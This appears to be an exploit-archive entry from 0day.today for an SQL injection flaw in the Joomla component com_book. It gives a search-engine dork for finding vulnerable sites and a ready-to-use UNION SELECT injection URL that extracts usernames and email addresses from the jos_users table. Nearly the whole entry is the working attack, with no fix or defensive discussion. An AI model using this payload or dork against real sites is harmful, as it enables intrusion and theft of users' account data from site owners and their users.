id: 10704
date: 01/21/2010
title: Joomla Component com_book SQL injection Vulnerability
author: Evil-Cod3r
cves: 

=====================================================
Joomla Component com_book SQL injection Vulnerability
=====================================================

 [»] Script:             [ Joomla Comp ]
    [»] Language:           [ PHP ]
    [»] Dork:               [ inurl:"com_book" ]
    [»] Founder:            [ Evil-Cod3r ]
 [»] Price:              [ Free ]
###########################################################################
 
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
 
 Exploit : -
 
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
 
 
Author: Evil-Cod3r



#  0day.today [2023-03-27]  #